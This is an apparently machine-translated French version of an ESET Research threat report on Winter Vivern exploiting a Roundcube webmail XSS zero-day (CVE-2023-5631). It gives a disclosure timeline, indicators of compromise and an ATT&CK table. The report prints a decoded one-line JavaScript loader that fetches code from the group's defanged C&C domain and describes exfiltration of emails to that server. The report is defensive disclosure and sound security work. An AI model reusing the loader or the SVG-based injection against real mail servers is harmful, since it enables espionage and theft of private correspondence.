Recherche ESET
ESET Research recommande de mettre à jour Roundcube Webmail vers la dernière version disponible dès que possible.
25 octobre 2023
•
,
5 minutes. lire
ESET Research suit de près les opérations de cyberespionnage de Winter Vivern depuis plus d’un an et, lors de notre surveillance de routine, nous avons découvert que le groupe avait commencé à exploiter un système de cyberespionnage de type Zero Day. XSS vulnérabilité dans le serveur Webmail Roundcube le 11 octobreème2023. Il s’agit d’une vulnérabilité différente de celle CVE-2020-35730qui a également été exploité par le groupe selon nos recherches.
Selon les données de télémétrie d’ESET, la campagne ciblait les serveurs Roundcube Webmail appartenant à des entités gouvernementales et à un groupe de réflexion, tous situés en Europe.
Calendrier de divulgation de la vulnérabilité :
- 2023-10-12: ESET Research a signalé la vulnérabilité à l’équipe Roundcube.
- 2023-10-14: L’équipe Roundcube a répondu et a reconnu la vulnérabilité.
- 2023-10-14: L’équipe Roundcube a corrigé la vulnérabilité.
- 2023-10-16: L’équipe Roundcube a publié des mises à jour de sécurité pour corriger la vulnérabilité (1.6.4, 1.5.5 et 1.4.15).
- 2023-10-18: ESET CNA émet un CVE pour la vulnérabilité (CVE-2023-5631).
- 2023-10-25: Article du blog ESET Research publié.
Nous tenons à remercier les développeurs de Roundcube pour leur réponse rapide et pour avoir corrigé la vulnérabilité dans un laps de temps si court.
Profil de Vivern d’hiver
Winter Vivern est un groupe de cyberespionnage révélé pour la première fois par Outils de domaine en 2021. On pense qu’il est actif depuis au moins 2020 et cible les gouvernements d’Europe et d’Asie centrale. Pour compromettre ses cibles, le groupe utilise des documents malveillants, des sites de phishing et une porte dérobée PowerShell personnalisée (voir les articles du Centre national de cyberprotection d’Ukraine et de Laboratoires Sentinelles). Nous pensons avec une faible confiance que Winter Vivern est lié à Videur Moustachuun groupe sophistiqué aligné sur la Biélorussie dont nous avons publié pour la première fois en août 2023.
Winter Vivern cible les serveurs de messagerie Zimbra et Roundcube appartenant à des entités gouvernementales depuis au moins 2022 – voir cet article de Point de preuve. Nous avons notamment observé que le groupe exploitait CVE-2020-35730une autre vulnérabilité XSS dans Roundcube, en août et septembre 2023. Notez que Sédnit (également connu sous le nom d’APT28) exploite également cette ancienne vulnérabilité XSS dans Roundcube, parfois contre les mêmes cibles.
Détails techniques
Exploitation de la vulnérabilité XSS, attribuée CVE-2023-5631, peut être effectué à distance en envoyant un message électronique spécialement conçu. Dans cette campagne Winter Vivern, les e-mails ont été envoyés depuis équipe.managment@outlook[.]com et avait le sujet Commencez dans votre Outlookcomme représenté sur la Figure 1.
À première vue, l’e-mail ne semble pas malveillant, mais si l’on examine le code source HTML, présenté dans Figure 2nous pouvons voir une balise SVG à la fin, qui contient une charge utile codée en base64.
Une fois que nous avons décodé la valeur codée en base64 dans le href attribut du utiliser étiquette, nous avons :
argument de valeur du href l’attribut n’est pas une URL valide, celui de cet objet une erreur l’attribut sera activé. Décoder la charge utile dans le une erreur L’attribut nous donne le code JavaScript suivant (avec l’URL malveillante défangée manuellement), qui sera exécuté dans le navigateur de la victime dans le cadre de sa session Roundcube :
var fe=document.createElement(‘script’);fe.src= »https://recsecas[.]com/controlserver/checkupdate.js »;document.body.appendChild(fe);
Étonnamment, nous avons remarqué que l’injection JavaScript fonctionnait sur une instance Roundcube entièrement corrigée. Il s’est avéré qu’il s’agissait d’une vulnérabilité XSS zero-day affectant le script côté serveur. rcube_washtml.php, qui ne nettoie pas correctement le document SVG malveillant avant d’être ajouté à la page HTML interprétée par un utilisateur Roundcube. Nous l’avons signalé à Roundcube et c’était patché le 14 octobreème2023 (voir ceci commettre). La vulnérabilité affecte Roundcube variantes 1.6.x avant 1.6.4, 1.5.x avant 1.5.5 et 1.4.x avant 1.4.15.
En résumé, en envoyant un e-mail spécialement conçu, les attaquants sont capables de charger du code JavaScript arbitraire dans le contexte de la fenêtre du navigateur de l’utilisateur de Roundcube. Aucune interaction manuelle autre que l’affichage du message dans un navigateur Web n’est requise.
La deuxième étape est un simple chargeur JavaScript nommé checkupdate.js et est montré dans figure 3.
La charge utile JavaScript finale – affichée dans Figure 4 – est capable de lister les dossiers et les e-mails du compte Roundcube actuel, et d’exfiltrer les e-mails vers le serveur C&C en effectuant des requêtes HTTP vers https://recsecas[.]com/controlserver/saveMessage.
Conclusion
Winter Vivern a intensifié ses opérations en utilisant une vulnérabilité zero-day dans Roundcube. Auparavant, il utilisait des vulnérabilités connues dans Roundcube et Zimbra, pour lesquelles des preuves de concept sont disponibles en ligne.
Malgré la faible sophistication de l’ensemble d’outils du groupe, il constitue une menace pour les gouvernements européens en raison de sa persistance, de ses campagnes de phishing très régulières et du fait qu’un nombre important d’applications accessibles sur Internet ne sont pas régulièrement mises à jour, bien qu’elles soient connues pour contenir des vulnérabilités. .
Pour toute demande de renseignements sur nos recherches publiées sur WeLiveSecurity, veuillez nous contacter à [email protected].
ESET Research propose des rapports de renseignement et des flux de données APT privés. Pour toute demande de renseignements sur ce service, visitez le Intelligence des menaces ESET page.
IoC
Des dossiers
|
SHA-1 |
Nom de fichier |
Détection |
Description |
|
97ED594EF2B5755F0549C6C5758377C0B87CFAE0 |
checkupdate.js |
JS/WinterVivern.B |
Chargeur JavaScript. |
|
8BF7FCC70F6CE032217D9210EF30314DDD6B8135 |
N / A |
JS/Kryptik.BIK |
Charge utile JavaScript exfiltrant les e-mails dans Roundcube. |
Réseau
|
IP |
Domaine |
Fournisseur d’hébergement |
Vu la première fois |
Détails |
|
38.180.76[.]31 |
recsecas[.]com |
M247 Europe S.R.L. |
2023-09-28 |
Serveur C&C Winter Vivern |
Adresses mail
équipe.managment@outlook[.]com
Ce tableau a été construit à l’aide version 13 du cadre MITRE ATT&CK.
|
Tactique |
IDENTIFIANT |
Nom |
Description |
|
Développement des ressources |
Acquérir une infrastructure : domaines |
Les opérateurs Winter Vivern ont acheté un domaine sur Registrar.eu. |
|
|
Acquérir une infrastructure : serveur |
Les opérateurs de Winter Vivern ont loué un serveur au M247. |
||
|
Développer des capacités : exploits |
Les opérateurs de Winter Vivern ont probablement développé un exploit pour Roundcube. |
||
|
Accès initial |
Exploiter une application destinée au public |
Winter Vivern a envoyé un e-mail exploitant CVE‑2023-5631 dans Roundcube. |
|
|
Hameçonnage |
La vulnérabilité est déclenchée via un email de phishing, qui doit être ouvert dans le webmail Roundcube par la victime. |
||
|
Exécution |
Exploitation pour l’exécution du client |
La charge utile JavaScript est exécutée par une vulnérabilité XSS dans Roundcube. |
|
|
Découverte |
Découverte de compte : compte de messagerie |
La charge utile JavaScript peut répertorier les dossiers du compte de messagerie. |
|
|
Collection |
Collecte d’e-mails : collecte d’e-mails à distance |
La charge utile JavaScript peut exfiltrer les e-mails du compte Roundcube. |
|
|
Commander et contrôler |
Protocole de couche application : protocoles Web |
Les communications C&C utilisent HTTP. |
|
|
Exfiltration |
Exfiltration sur le canal C2 |
L’exfiltration se fait via HTTPs et vers le même serveur C&C. |
